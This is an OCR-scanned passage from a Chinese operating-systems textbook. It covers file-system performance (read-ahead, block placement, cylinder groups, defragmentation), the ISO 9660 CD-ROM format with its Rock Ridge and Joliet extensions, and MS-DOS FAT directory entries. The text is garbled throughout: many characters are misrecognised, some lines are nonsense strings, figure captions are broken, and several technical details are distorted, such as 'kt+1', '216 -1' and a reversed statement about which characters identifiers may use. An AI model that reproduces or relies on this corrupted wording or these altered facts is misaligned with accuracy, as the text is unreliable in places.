第 二 个 明显 提高 文件 系统 性 能 的 技术 是 : 在 需要 用 到 块 之 前 ， 试 图 
提前 将 其 写 入 高 速 缓存 ， 从 而 提高 命中 率 。 特 别 地 ， 许 多 文件 都 是 顺序 
读 的 。 如 果 请 求 文件 系统 在 某 个 文件 中 生成 块 k， 文 件 系 统 执行 相关 操 
作 且 在 完成 之 后 ， 会 在 用 户 不 察觉 的 情形 下 检查 高 速 缓存 ， 以 便 确 定 块 
k+1 是 否 已 经 在 高 速 缓存 。 如 果 还 不 在 ， 文 件 系统 会 为 块 kt+1 安 排 一 个 预 
读 ， 因 为 文件 系统 希望 在 需要 用 到 该 块 时 ， 它 已 经 在 高 速 缓存 或 者 至 少 
马上 就 要 在 高速 绥 存 中 了 。 














当然 ， 块 所 前 读 集 略 只 适用 于 顺序 读 取 的 文件 。 对 随机 存 取 文 件 ， 

提前 读 丝 坚 不 起 作用 。 相 反 ， 它 还 会 帮 倒 忙 ， 因 为 读 取 无 用 的 块 以 及 从 
噩 速 缓存 中 删除 潜在 有 用 的 块 将 会 占用 固定 的 磁盘 带宽 (如 果 有 “ 脏 ” 块 
的 话 ， 还 希 要 将 它们 写 回 磁盘 ， 这 就 占用 了 更 多 的 磁盘 带宽 ) 。 那 么 所 
前 读 策略 是 否 值得 采用 呢 ? 文件 系统 通过 跟踪 每 一 个 打开 文件 的 访问 方 
式 来 确定 这 一 点 。 例 如 ， 可 以 使 用 与 文件 相关 联 的 某 个 位 协助 跟 踩 该 文 
件 到 后 是 “顺序 存 取 方 式 ” 还 是 “随机 存 取 方 式 "。 在 最 初 不 能 确定 文件 属 
于 哪 种 存 取 方 式 时 ， 移 将 该 位 设置 成 顺序 存 取 方式 。 但 是 ， 碍 找 一 完 

成 ， 就 将 该 位 清除 。 如 条 再 次 及 生 顺序 读 取 ， 就 再 次 设置 该 位 。 这 样 ， 

文件 系统 可 以 通过 合理 的 猜测 ， 确 定 是 售 应 该 采取 提前 读 的 策略 。 即 便 











弄 错 了 一 次 也 不 会 产生 严重 后 果 ， 不 过 是 浪费 一 小 段 磁盘 的 带宽 去 了 。 


3. 减 少 磁 盘 臂 运动 


高 速 缓存 和 块 提 前 读 并 不 是 提高 文件 系统 性 能 的 惟一 方法 。 另 一 种 
重要 技术 是 把 有 可 能 顺序 存 取 的 块 放 在 一 起 ， 当 然 最 好 是 在 同一 个 柱 面 
上 ， 从 而 减少 磁盘 辟 的 移动 次 数 。 当 写 一 个 输出 文件 时 ， 文 件 系 统 就 必 
须 按照 要 求 一 次 一 次 地 分 配 磁盘 块 。 如 果 用 位 图 来 记录 空闲 块 ， 并 且 整 
个 位 图 在 内 存 中 ， 那 么 选择 与 前 一 块 最 近 的 空 闪 块 是 很 容易 的 。 如 末 用 
空闲 表 ， 并 且 链 表 的 一 部 分 存在 磁盘 上 ， 要 分 配 紧 邻 着 的 空闲 块 就 困难 
多 。 








S 
di 


不 过 ， 即 使 采用 空闲 表 ， 也 可 以 采用 块 复 技术 。 这 里 用 到 一 个 小 技 
巧 ， 即 不 用 块 而 用 连续 块 簇 来 跟踪 磁盘 存储 区 。 如 果 一 个 扇 区 有 512 个 
字 节 ， 有 可 能 系统 采用 1KB 的 块 CPX) ， 但 却 按 每 2 块 〈4 个 属 
区 ) 一 个 单位 来 分 配 磁盘 存储 区 。 这 和 2KB 的 磁盘 块 并 不 相同 ， 因 为 在 
高 速 缓存 中 它 依然 使 用 1KB 的 块 ， 磁 盘 与 内 存 数据 之 间 传 送 也 是 以 IKB 
为 单位 进行 ， 但 在 一 个 空闲 的 系统 上 顺序 读 取 文件 ， 寻 道 的 次 数 可 以 减 
少 一 半 ， 从 而 使 文件 系统 的 性 能 大 大 改善 。 若 考虑 旋转 定位 则 可 以 得 到 
这 类 方案 的 变 体 。 在 分 配 块 时 ， 系 统 尽量 把 一 个 文件 中 的 连续 块 存放 在 
同一 柱 面 上 。 











在 使 用 i 节 点 或 任何 类 似 i 节 点 的 系统 中 ， 另 一 个 性 能 瓶颈 是 ， 读 取 


一 个 很 短 的 文件 也 需要 两 次 磁盘 访问 : 一 次 是 访问 证 点 ， 妃 一 次 是 访 
问 块 。 通 党 情况 下 ，i 证 点 的 放置 如 图 4-29a 所 示 。 其 中 ， 全 部 i 节 点 都 放 
在 靠近 磁盘 开始 位 置 ， 所 以 i 节 点 和 它 指 疝 的 块 之 间 的 平均 距离 是 柱 面 
数 的 一 半 ， 这 将 需要 较 长 的 寻 道 时 间 。 
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图 4-29 ai 节点 放 在 磁盘 开始 位 置 ; DAADAA, HAA AT 
的 块 和 i 节 点 





一 个 简单 的 改进 方法 是 ， 在 磁盘 中 部 而 不 是 开始 处 存放 i 节 点 ， 此 
时 ， 在 i 节点 和 第 一 块 之 间 的 平均 寻 道 时 间 减 为 原来 的 一 半 。 男 一 种 做 
法 是 : 将 磁盘 分 成 多 个 柱 面 组 ， 每 个 柱 面 组 有 自己 的 i 节 点 、 数 据 块 和 
TWK (McKusick 等 人 ，1984) ， 见 图 4-29b。 在 文件 创建 时 ， 可 选取 
任 一 i 节点， 但 首先 在 该 节点 所 在 的 柱 面 组 上 查找 块 。 如 果 在 该 柱 面 组 
中 没有 空闲 的 块 ， 就 选用 与 之 相 邻 的 柱 面 组 的 一 个 块 。 


4.4.5 ”磁盘 雁 片 整理 


在 初始 安装 操作 系统 后 ， 从 磁盘 的 开始 位 置 ， 一 个 接 一 个 地 连续 安 
装 了 程序 与 文件 。 所 有 的 空闲 磁盘 空间 放 在 一 个 单独 的 、 与 被 安装 的 文 
件 邻近 的 单元 里 。 但 随 着 时 间 的 流逝 ， 文 件 被 不 断 地 创建 与 删除 ， 于 是 
磁盘 会 产生 很 多 碎片 ， 文 件 与 空 六 到 处 都 是 。 结 果 是 ， 当 创建 一 个 新 文 
件 时 ， 它 使 用 的 块 会 散布 在 整个 磁盘 上 ， 造 成 性 能 的 降低 。 











磁盘 性 能 可 以 通过 如 下 方式 恢复 : 移动 文件 使 它们 相 邻 ， 并 把 所 有 
的 《至 少 是 大 部 分 的 ) 空闲 空间 放 在 一 个 或 多 个 大 的 连续 的 区 域内 。 
Windows 有 一 个 程序 defrag 就 是 从 事 这 个 工作 的 。Windows 的 用 户 应 该 
定期 使 用 它 。 











磁盘 碎片 整理 程序 会 在 一 个 在 分 区 末端 的 连续 区 域内 有 适量 空闲 衬 
闻 的 文件 系统 上 很 好 地 运行 。 这 段 空 间 会 允许 磁 盘 碎 片 整 理 程序 选择 在 
分 区 开始 端的 碎片 文件 ， 并 复制 它们 所 有 的 块 放 到 空闲 空间 内 。 这 个 动 
作 在 磁盘 开始 处 释放 出 一 个 连续 的 块 空间 ， 这 样 原始 或 其 他 的 文件 可 以 
在 其 中 相 邻 地 存放 。 这 个 过 程 可 以 在 下 一 大 块 的 磁盘 空间 上 重复 ， 并 继 
续 下 去 。 








有 些 文件 不 能 被 移动 ， 包 括 页 文件 、 休 了 虐 文件 以 及 日 志 ， 因 为 移动 
这 些 文件 所 震 的 管理 成 本 要 大 于 移动 它们 的 价值 。 在 一 些 系 统 中 ， 这 些 





文件 是 固定 大 小 的 连续 的 区 域 ， 因 此 它们 不 需要 进行 雁 片 整理 。 这 类 文 
件 缺 乏 灵活 性 会 造成 一 些 问 题 ， 一 种 情况 是 ， 它 们 恰好 在 分 区 的 末端 附 
近 并 且 用 户 想 减 小 分 区 的 大 小 。 解 决 这 种 问题 的 惟一 的 方法 是 把 它们 一 
起 删除 ， 改 变 分 区 的 大 小 ， 然 后 再 重新 建立 它们 。 

Linux 文 件 系 统 〈 特 别 是 ext2 和 ext3) 由 于 其 选择 磁盘 块 的 方式 ， 在 
磁盘 碎片 整理 上 一 般 不 会 遭受 像 Windows 那 样 的 困难 ， 因 此 很 少 需要 手 
BEN) He ak TEE Fy EE 





4.5 文件 系统 实例 


在 这 一 节 ， 我 们 将 讨论 文件 系统 的 几 个 实例 ， 包 括 从 相对 简单 的 文 
件 系 统 到 十 分 复杂 的 文件 系统 。 现 代 流 行 的 UNIX 文 件 系 统 和 Windows 
Vista 自 带 文件 系统 在 本 书 的 第 10 章 和 第 11 章 有 详细 介绍 ， 在 此 就 不 再 讨 
论 了 。 但 是 我 们 有 必要 来 看 看 这 些 文件 系统 的 前 号。 








4.5.1 CD-ROM 文 件 系统 


作为 第 一 个 文件 系统 实例 ， 让 我 们 来 看 看 用 于 CD-ROM 的 文件 系 
统 。 因 为 这 些 文件 系统 是 为 一 次 性 写 介质 设计 的 ， 所 以 非常 简单 。 例 
如 ， 该 文件 系统 不 需要 记录 空闲 块 ， 这 是 因为 一 旦 光盘 生产 出 来 后 ， 
CD-ROM 上 的 文件 就 不 能 被 删除 或 者 创建 了 了。 下 面 我 们 来 看 看 主要 的 
CD-ROM 文 件 系 统 类 型 以 及 对 这 个 文件 系统 的 两 种 扩展 。 














在 CD-ROM 出 现 一 些 年 后 ， 引 进 了 CD-R“《 可 记录 CD) 。 不 像 CD- 
ROM，CD-R 可 以 在 初次 刻录 之 后 加 文件 ， 但 只 能 简单 地 加 在 CD-R 的 最 
后 面 。 文 件 不 能 删除 (尽管 可 以 更 新 目录 来 隐藏 已 存在 的 文件 ) 。 因 而 
对 于 这 种 “只 能 添加 ”的 文件 系统 ， 其 基本 的 性 质 不 会 改变 。 特 别 地 ， 所 
有 的 空闲 空间 放 在 了 CD 末端 连续 的 一 大 块 内 。 














1.ISO 9660 文 件 系统 


最 普遍 的 一 种 CD-ROM 文 件 系 统 的 标准 是 1988 年 被 采纳 的 名 为 ISO 
9660 的 国际 标准 。 实 际 上 现在 市 场 上 的 所 有 CD-ROM 都 文 持 这 个 标准 ， 
有 的 则 带 有 一 些 扩展 (下面 会 对 此 进行 讨论 ) 。 这 个 标准 的 一 个 目标 就 
是 使 CD-ROM 独 立 于 机 器 所 采用 的 字 节 顺序 和 使 用 的 操作 系统 ， 即 在 所 
有 的 机 器 上 都 是 可 读 的 。 因 此 ， 在 该 文件 系统 上 加 上 了 一 些 限制 ， 使 得 
最 弱 的 操作 系统 〈 如 MS-DOS) 也 能 读 取 该 文件 系统 。 


CD-ROM 没 有 和 磁盘 一 样 的 同心 柱 面 ， 而 是 沿 一 个 连续 的 螺旋 线 来 
顺序 存储 信息 〈 当然， 器 越 螺 旋 线 查找 也 是 可 能 的 ) 。 螺 旋 上 的 位 序列 
被 划分 成 大 小 为 2352 字 节 的 逻辑 块 〈 也 称 为 逻辑 扇 区 ) 。 这 些 块 有 的 用 
来 进行 引导 ， 有 的 用 来 进行 错误 纠正 或 者 其 他 一 些 用 途 。 每 个 逻辑 块 的 
有 效 部 分 是 2048 字 节 。 当 用 于 存放 音乐 时 ，CD 中 有 导入 部 分 、 导 出 部 
分 以 及 轨道 间 的 间 际 ， 但 是 用 于 存储 数据 的 CD-ROM 则 没有 这 些 。 通 
常 ， 螺 旋 上 的 逻辑 块 是 按 分 钟 或 者 秒 进行 分 配 的 。 通 过 转换 系数 1 秒 =75 
块 ， 则 可 以 转换 得 到 相应 的 线性 块 号 。 











ISO 9660 支 持 的 CD-ROM 集 可 以 有 多 达 216 -1 个 CD。 每 个 单独 的 
CD-ROM 还 可 分 为 多 个 逻辑 卷 〈 分 区 ) 。 下 面 我 们 重点 考虑 单个 没有 分 
区 CD-ROM 时 的 ISO 9660。 


每 个 CD-ROM 有 16 块 作为 开始 ， 这 16 块 的 用 途 在 ISO 9660 标 准 中 没 
有 定义 。CD-ROM 制 造 商 可 以 在 这 一 区 域 里 放 入 引导 程序 ， 使 计算 机 能 
够 从 CD-ROM 引 导 ， 或 者 用 于 其 他 目的 。 接 下 来 的 一 块 存放 基本 卷 描述 


符 (primary volume descriptor) ， 基 本 卷 描 述 符 包含 了 CD-ROM 的 一 些 
基本 信息 。 这 些 信息 包括 系统 标识 符 〈32 字 节 ) 、 卷 标识 从 (32 字 

节 ) 、 发 布 标识 待 〈128 字 节 ) 和 数据 预备 标识 符 《〈128 字 节 ) 。 制 造 商 
可 以 在 上 面 的 几 个 域 中 填 入 需要 的 信息 ， 但 是 为 了 里 平台 的 兼容 性 ， 不 
能 使 用 大 写字 母 、 数 字 以 及 很 少 一 部 分 标点 符号 。 











基本 卷 描述 符 还 包含 了 三 个 文件 的 名 字 ， 这 三 个 文件 分 别 用 来 存储 
概述 、 版 权 声明 和 文献 信息 。 除 此 之 外 ， 还 包含 有 一 些 关 键 数字 信息 ， 
例如 逻辑 块 的 大 小 (通常 为 2048， 但 是 在 某 些 情况 下 可 以 是 4096、8192 
或 者 更 大 ) 、CD-ROM 所 包含 的 块 数目 以 及 CD-ROM 的 创建 日 期 和 过 期 
日 期 。 基 本 卷 描 述 符 也 包含 了 根 目 录 的 目录 表 项 ， 说 明 根 目录 在 CD- 
ROM 的 位 置 〈《 即 从 哪 一 块 开始 ) 。 从 这 个 根 目录 ， 系 统 就 能 找到 其 他 
文件 所 在 的 位 置 。 














除 基 本 卷 描述 符 之 外 ，CD-ROM 还 包含 有 一 个 补充 卷 描述 符 
(supplementary volume descriptor) 。 它 和 基本 卷 描述 符 包含 类 似 的 信 


A, 在 这 里 不 再 详细 讨论 。 








根 目录 和 所 有 的 其 他 目录 包含 可 变数 目的 目录 项 ， 目 录 中 的 最 后 一 
个 目录 项 有 一 位 用 于 标记 该 目录 项 是 目录 中 的 最 后 一 个 。 目 录 项 本 身 也 
征 长 度 可 变 的 。 每 一 个 目录 项 由 10 到 12 个 域 构成 ， 其 中 一 些 域 是 ASCII 
域 ， 力 外 一 些 是 二 进 制 数 字 域 。 二 进 制 域 被 编码 两 次 ， 一 个 用 于 低地 址 
结尾 格式 “例如 在 Pentium 上 所 用 的 ) ， 一 个 用 于 高 地 址 结尾 格式 《〈 例 

















如 在 SPARC 上 所 用 的 ) 。 因 此 ， 一 个 16 位 的 数字 需要 4 个 字 节 ， 一 个 32 


位 的 数字 需要 8 个 字 节 。 











这 样 元 余 编 码 的 目的 主要 是 为 了 能 在 标准 发 展 的 同时 照顾 到 各 个 方 
面 的 利益 。 如 果 该 标准 仅 规定 低地 址 结尾 ， 那 么 在 产品 中 使 用 高 地 址 结 
尾 的 三家 就 会 觉得 自己 受到 歧视 ， 就 不 会 接受 这 个 标准 。 所 以 我 们 可 以 
准确 地 用 元 余 的 字 市 /小 时 数 来 衡量 一 张 CD-ROM 的 情感 因素 。 











ISO 9660 目 录 项 的 格式 如 图 4-30 所 示 。 因 为 目录 项 是 长 度 可 变 的 ， 
所 以 ， 第 一 个 域 就 说 明 这 一 项 的 长 度 。 这 一 字 节 被 定义 为 高 位 在 左 ， 以 
避免 混淆。 











目录 项 长 度 


图 430 ISO 9660 的 目录 项 





目录 项 可 能 包含 有 扩展 属性 。 如 琳 使 用 了 这 个 特性 ， 则 第 二 个 字 市 
就 说 明 扩 展 属性 的 长 度 。 





接 下 来 是 文件 本 身 的 起 始 块 。 文 件 是 以 连续 块 的 方式 存储 的 ， 所 以 
一 个 文件 的 位 置 完全 可 以 由 起 始 块 的 位 置 和 大 小 来 确定 。 起 始 块 的 下 一 
个 域 就 是 文件 大 小 。 








CD-ROM 的 日 期 和 时 间 被 记录 在 下 一 个 域 中 ， 其 中 分 隔 的 字 节 分 别 
表示 年 、 月 、 上 日、 小时、 分钟、 秒 和 时 区 。 年 份 是 从 1900 年 开始 计数 
的 ， 这 意味 着 CD-ROM 将 会 遇 到 2156 年 问题 ， 因 为 在 2155 年 之 后 将 会 是 
1900 年 。 如 果 定 义 初始 的 日 期 为 1988 年 (标准 通过 的 那 一 年 的话， 那 
么 这 个 问题 就 可 以 推迟 88 年 产生 ， 也 就 是 2244 年 。 





标志 位 域 包含 一 些 其 他 的 位 ， 包 括 一 个 用 来 在 打开 目录 时 隐藏 目录 
项 〈 来 自 MS-DOS 的 特性 ) 的 标志 位 ， 一 个 用 以 区 分 该 项 是 文件 还 是 目 
录 的 标志 位 ， 一 个 用 以 标志 是否 使 用 扩展 属性 的 标志 位 ， 以 及 一 个 用 来 
标志 该 项 是 否 为 目录 中 最 后 一 项 的 标志 位 。 其 他 一 些 标志 位 也 在 这 个 域 
中 ， 但 是 在 此 我 们 不 再 讨论 。 下 一 个 域 说 明了 在 ISO 9660 的 最 简 版 本 中 
古人 否 使 用 文件 分 隔 块 ， 我 们 也 不 做 讨论 。 




















再 下 一 个 域 标明 了 该 文件 放 在 哪 一 个 CD-ROM 上 。 一 个 CD-ROM 的 
目录 项 可 以 引用 在 同一 CD-ROM 集 中 的 另外 一 个 CD-ROM 上 的 文件 。 用 
这 样 的 方法 就 可 以 在 第 一 张 CD-ROM 上 建立 一 个 主 目 录 ， 该 主 目录 列 出 
了 在 这 个 CD-ROM 和 集合 中 的 其 他 所 有 CD-ROM 上 的 文件 。 





图 4-30 中 标 有 工 的 域 给 出 了 文件 名 的 大 小 (以 字 节 为 单位 ) 。 之 后 
的 域 就 是 文件 名 本 号 。 一 个 文件 名 由 基本 名 、 一 个 点 、 扩 展 名 、 分 号 和 
二 进 制版 本 号 〈1 或 2 个 字 节 ) 构成 。 基 本 名 和 扩展 名 可 以 使 用 大 写字 
母 、 数 字 0~~9 和 下 划 线 。 蔡 止 使 用 其 他 字符 以 保证 所 有 的 机 器 都 能 处 理 
这 个 文件 名 。 基 本 名 最 多 可 以 为 8 个 字符 ， 而 扩展 名 最 多 可 以 为 3 个 字 











符 。 这 样 做 是 为 了 保证 能 和 MS-DOS 兼 容 。 只 要 文件 的 版 本 号 不 同 ， 则 
相同 的 文件 名 可 以 在 同一 个 目录 中 出 现 多 次 。 


最 后 两 个 域 不 是 必需 的 。 填 充 域 用 来 保证 每 一 个 目录 项 都 是 偶数 个 
字 节 ， 以 2 字 节 为 边界 对 齐 下 一 项 的 数字 域 。 如 果 需 要 填充 的 话 ， 就 用 0 
代替 。 最 后 一 个 域 是 系统 使 用 域 ， 该 域 的 功能 和 大 小 没有 定义 ， 仅 仅 只 
要 求 该 域 为 偶数 个 字 节 。 不 同 的 系统 对 该 域 有 不 同 的 用 途 。 例 如 ， 
Macintosh 系 统 就 把 此 域 用 来 保存 Finder 标 志 。 





一 个 目录 中 的 项 除了 前 两 项 之 外 ， 其 余 的 都 按 字 母 顺 序 排列 。 第 一 
项 表示 当前 目录 本 里 ， 第 二 项 表示 当前 目录 的 父 目录 。 这 和 UNIX 的 . 目 
录 和 .. 目 录 相 似 。 而 文件 本 喘 不 需要 按 其 目录 项 在 目录 中 的 顺序 来 排 
列 。 


























对 于 目录 中 目录 项 的 数目 没有 特定 的 限制 ; 但 是 对 于 目录 的 髓 套 深 
度 有 限制 ， 最 大 的 目录 风 套 深 虐 为 8。 为 了 使 得 有 关 的 实现 简化 一 些 ， 


这 个 限制 是 任意 设置 的 。 








ISO 9660 定 义 了 三 个 级 别 。 级 别 1 的 限制 最 多 ， 限 制 文件 名 使 用 上 
面 提 到 的 8+3 个 字符 的 表示 法 ， 而 且 所 有 的 文件 必须 是 连续 的 (这 些 我 
们 在 前 面 介绍 过 〉 。 进 而 ， 目 录 名 被 限制 在 8 个 字符 而 且 不 能 有 扩展 
名 。 这 个 级 别 的 使 用 ， 使 得 CD-ROM 可 以 在 所 有 的 机 器 上 读 出 。 


级 别 2 放宽 了 对 长 度 的 限制 。 它 允许 文件 和 目录 名 多 达 31 个 字符 ， 





但 是 字符 集 还 是 一 样 的 。 


级 别 3 使 用 和 级 别 2 同样 的 限制 ， 但 是 文件 不 需要 是 连续 的 。 在 这 个 
级 别 上 ， 一 个 文件 可 以 由 几 个 段 〈extents) 构成 ， 每 一 个 段 可 以 由 若干 
连续 分 块 构成 。 同 一 个 分 块 可 以 在 一 个 文件 中 出 现 多 次 ， 也 可 以 出 现在 
两 个 或 者 更 多 的 文件 中 。 如 有 果 相 当 大 的 一 部 分 数据 在 几 个 文件 中 重复 ， 
级 别 3 则 通过 要 求 数据 不 能 出 现 多 次 来 进行 空间 上 的 优化 。 


2.Rock Ridge 扩 展 


正如 我 们 上 面 所 看 到 的 ，ISO 9660 在 很 多 方面 有 限制 。 在 这 个 标准 
公布 不 入，UNIX 工 作者 开始 在 这 个 标准 上 进行 扩展 ， 使 得 在 CD-ROM 
上 能 实现 UNIX 文 件 系 统 。 这 个 扩展 被 命名 为 Rock Ridge， 这 个 名 字 来 
源 于 Gene Wilder 的 电影 《Blazing Saddles》 中 一 个 小 镇 ， 也 许 委 员 会 的 
成 员 之 一 喜欢 这 个 电影 ， 便 以 此 命名 。 


该 扩展 使 用 了 系统 使 用 域 ， 使 得 Rock Ridge CD-ROM 可 以 在 所 有 计 
算 机 上 可 读 。 其 他 所 有 的 域 仍 然 保 持 ISO 9660 标 准 中 的 定义 。 所 有 其 他 
不 识别 Rock Ridge 扩 展 的 系统 只 需要 忽略 这 个 域 ， 把 盘 当 作 普 通 的 CD- 
ROM 来 识别 即 可 。 


该 扩展 分 为 下 面 儿 个 域 : 


1)PX 一 一 POSIX 属 性 。 


2)PN 一 一 主 设备 号 和 次 设备 号 。 
3)SL 一 一 符号 链接 。 
A)NM——#$ RE. 
5)CL 一 一 子 位 置 。 
6)PL 一 一 父 位 置 。 
7)RE 一 一 重 定 位 。 
8)IF 一 一 时 间 惟 。 


PX 域 包含 了 标准 UNIX 的 rwxrwxrwx 所 有 者 、 同 组 用 户 和 其 他 用 户 
权限 位 。 也 包含 了 包含 在 模式 字 中 的 其 他 位 ， 如 SETUID 位 和 SETGID 位 


FY 
等 。 





为 了 能 在 CD-ROM 上 表示 原始 设备 ， 需 要 PN 域 来 表示 。 该 域 包 含 
了 和 文件 相关 的 主 设备 号 和 次 设备 号 。 这 样 ，/dev 目 录 的 内 容 就 可 以 在 
写 到 CD-ROM 上 之 后 在 目标 系统 上 重新 正确 地 构造 。 





SL 域 是 香 写 链接 ， 它 允许 在 一 个 文件 系统 上 的 文件 可 以 引用 为 一 个 
文件 系统 上 的 文件 。 





最 重要 的 域 是 NM 域 。 它 允许 同一 个 文件 可 以 关联 第 二 个 名 字 。 这 


个 名 字 不 受 ISO 9660 字 符 集 和 长 度 的 限制 ， 这 样 使 得 在 CD-ROM 上 可 以 
表示 任意 的 UNIX 文 件 。 





接 下 来 的 三 个 域 一 起 用 来 消除 ISO 9660 中 的 对 目录 组 套 深 上 度 为 8 的 
限制 。 使 用 这 几 个 域 可 以 指明 一 个 目录 被 重 定位 了 ， 而 且 可 以 标明 其 层 
结构 。 这 对 于 消除 深度 限制 非常 有 用 。 











最 后 ，TF 域 包含 了 每 个 UNIX 的 i 节 点 中 的 三 个 时 间 惟 : 文件 创建 时 
间 、 文 件 修改 时 间 和 文件 最 后 访问 的 时 间 。 有 了 这 些 扩展 ， 就 可 以 将 一 
个 UNIX 文 件 系 统 复制 到 CD-ROM 上， 并 且 能 够 在 不 同 的 系统 上 正确 恢 
复 。 





3.Joliet 扩 展 


UNIX 委 员 会 不 是 惟一 对 ISO 9660 进 行 扩展 的 小 组 ， 微 软 也 发 现 了 
这 个 标准 有 太 多 的 限制 (尽管 这 些 限 制 最 初 都 是 由 于 微软 自己 的 MS- 
DOS 引 起 的 ) 。 所 以 微软 也 做 了 一 些 扩展 ， 名 为 Joliet。 这 个 扩展 设计 的 
目的 是 ， 为 了 能 够 将 Windows 文 件 系统 复制 到 CD-ROM 上， 并 且 能 够 恢 
复 (与 为 UNIX 设 计 Rock Ridge 的 思路 一 样 ) 。 实 际 上 所 有 能 在 Windows 
上 运行 的 、 使 用 CD-ROM 的 程序 都 文 持 Joliet， 包 括 可 写 CD 的 刻录 程 
序 。 通 向 这 些 程序 都 让 用 户 选 择 是 使 用 ISO 9660 标 准 还 是 Joliet 标 准 。 





Joliet 提 供 的 主要 扩展 为 : 


1) 长 文件 名 。 


2)Unicode 字 符 集 。 





3) 比 8 层 更 深 的 目录 髓 套 深 上 度 。 


4) 带 扩展 名 的 目录 。 





第 一 个 扩展 允许 文件 名 多 达 64 字 符 。 第 二 个 扩展 允许 文件 名 使 用 
Unicode 字 符 集 ， 这 个 扩展 对 那些 不 使 用 拉丁 字符 集 的 国家 非常 重要 ， 
如 上 日本、 以色列 和 和 希腊。 因为 Unicode 字 符 是 2 个 字 节 的 ， 所 以 Joliet 最 长 
的 文件 名 可 以 达到 128 字 节 。 





和 Rock Ridge 一 样 ，Joliet 同 样 消除 了 对 目录 髓 套 深度 的 限制 。 目 录 
可 以 根据 需要 达到 一 定 的 舱 套 深度 。 最 后 ， 目 录 名 也 可 以 有 扩展 名 。 目 
前 还 不 清楚 为 什么 有 这 个 扩展 ， 因 为 大 多 数 的 Windows 目 录 从 来 没有 打 
展 名 ， 但 或 许 有 一 天 会 用 到 。 

















4.5.2 MS-DOS 文 件 系统 


MS-DOS 文 件 系 统 是 第 一 个 IBM PC 系列 所 采用 的 文件 系统 。 它 也 是 
Windows 98 与 Windows ME 所 采用 的 主要 的 文件 系统 。Windows 2000、 
Windows XP 与 Windows Vista 上 也 文 持 它 ， 虽 然 除了 软盘 以 外 ， 它 现在 
已 经 不 再 是 新 的 PC 的 标准 了 。 但 是 ， 它 和 它 的 扩展 CFAT-32) 一 直 被 
许多 藤 入 式 系统 所 广泛 使 用 。 大 部 分 的 数码 相机 使 用 它 。 许 多 MP3 播 放 
器 只 能 使 用 它 。 流 行 的 苹果 公司 的 iPod 使 用 它 作 为 默认 的 文件 系统 ， 尽 
管 知 识 渊博 的 骇 客 可 以 重新 格式 化 iPod 并 安装 一 个 不 同 的 文件 系统 。 使 
用 MS-DOS 文 件 系 统 的 电子 设备 的 数量 现在 要 远 远 多 于 过 去 ， 并 且 当 然 
远 远 多 于 使 用 更 现代 的 NTFS 文 件 系统 的 数量 。 因 此 ， 我 们 有 必要 看 一 
看 其 中 的 一 些 细节 。 








要 读 文件 时 ，MS-DOS 程 序 首 先 要 调用 open 系 统 调用 ， 以 获得 文件 
的 句柄 。open 系 统 调用 识别 一 个 路 径 ， 可 以 是 绝对 路 径 或 者 是 相对 于 现 
在 工作 目录 的 路 径 。 路 径 是 一 个 分 量 一 个 分 量 地 查找 的 ， 直 到 查 到 最 终 
的 目录 并 读 进 内 存 。 然 后 开始 搜索 要 打开 的 文件 。 


尽管 MS-DOS 的 目录 是 可 变 大 小 的 ， 但 它 使 用 固定 的 32 字 节 的 目录 
项 ，MS-DOS 的 目录 项 的 格式 如 图 4-31 所 示 。 它 包含 文件 名 、 属 性 、 建 
立 日 斯 和 时 间 、 起 始 块 和 具体 的 文件 大 小 。 在 每 个 分 开 的 域 中 ， 少 于 





8+3 个 字符 的 文件 名 左 对 齐 ， 在 右边 补 空格 。 属 性 域 是 一 个 新 的 域 ， 包 
含 用 来 指示 一 个 文件 是 只 读 的 、 存 档 的 、 隐 藏 的 还 是 一 个 系统 文件 的 
位 。 不 能 写 只 读 文 件 ， 这 样 避免 了 文件 意外 受 损 。 存 档 位 没有 对 应 的 操 
作 系 统 的 功能 〈 即 MS-DOS 不 检查 和 设置 它 ) 。 存 档 位 主要 的 用 途 是 使 
用 户 级 别 的 存档 程序 在 存档 一 个 文件 后 清理 这 一 位 ， 其 他 程序 在 修改 了 
这 个 文件 之 后 设置 这 一 位 。 以 这 种 方式 ， 一 个 备份 程序 可 以 检查 每 个 文 
件 的 这 一 位 来 确定 是 人 否 需要 备份 该 文件 。 设 置 隐藏 位 能 够 使 一 个 文件 在 
目录 列表 中 不 出 现 ， 其 作用 是 避免 初级 用 户 被 一 些 不 数 悉 的 文件 摘 糊 涂 
了 。 最 后 ， 系 统 位 也 隐藏 文件 。 男 外 ， 系 统 文件 不 可 以 用 del 命 令 删 
除 ， 在 MS-DOS 的 主要 组 成 部 分 中 ， 系 统 位 都 被 设置 。 








\ \ 
扩展 名 属性 保留 时 间 日 期 第 一 块 块 号 


图 431 MS-DOS 的 目录 项 


目录 项 也 包含 了 文件 建立 和 最 后 修改 的 日 期 和 时 间 。 时 间 只 是 精确 
到 +2s， 因 为 它 只 是 用 2 个 字 节 的 域 来 存储 ， 只 能 存储 65 536 个 不 同 的 值 
(一 天 包含 86 400 秒 ) 。 这 个 时 间 域 被 分 为 秒 〈5 个 位 ) 、 分 〈6 个 位 ) 
和 小 时 《5 个 位 ) 。 以 日 为 单位 计算 的 日 期 使 用 三 个 子 域 : 日 (5 个 
位 ) ， 月 〈4 个 位 ) ， 年 -1980《〈7 个 位 ) 。 用 7 个 位 的 数字 表示 年 ， 时 间 





的 起 始 为 1980 年 ， 最 高 的 表示 年 份 是 2107 年 。 所 以 MS-DOS 有 内 在 的 
2108 年 问题 。 为 了 避免 灾难 ，MS-DOS 的 用 户 应 该 尽快 开始 在 2108 年 之 
前 转变 工作 。 如 果 把 MS-DOS 使 用 组 合 的 日 期 和 时 间 域 作为 32 位 的 秒 计 
数 右 ， 它 融 能 准确 到 秒 ， 可 把 灾难 推迟 到 2116 年 。 


MS-DOS 按 32 位 的 数字 存储 文件 的 大 小 ， 所 以 理论 上 文件 大 小 能 够 
大 至 4GB。 尽 管 如 此 ， 其 他 的 约束 〈 下 面 论 述 ) 将 最 大 文件 限制 在 2GB 
或 者 更 小 。 让 人 吃惊 的 是 目录 项 中 的 很 大 一 部 分 空间 (10 字 节 ) 没有 使 
用 。 





MS-DOS 通 过 内 存 里 的 文件 分 配 表 来 跟踪 文件 块 。 目 录 表 项 包含 了 
第 一 个 文件 典 的 编号 ， 这 个 编号 用 作 内 存 里 有 64K 个 目录 项 的 FAT 的 过 
引 。 治 着 这 条 链 ， 所 有 的 块 都 能 找到 。FAT 的 操作 在 图 4-12 中 有 描述 。 


FAT 文 件 系 统 总 共有 三 个 版 本 FAT-12，FAT-16 和 FAT-32， 取 决 
于 磁盘 地 址 包含 有 多 少 二 进 制 位 。 其 实 ，FAT-32 只 用 到 了 地 址 空间 中 
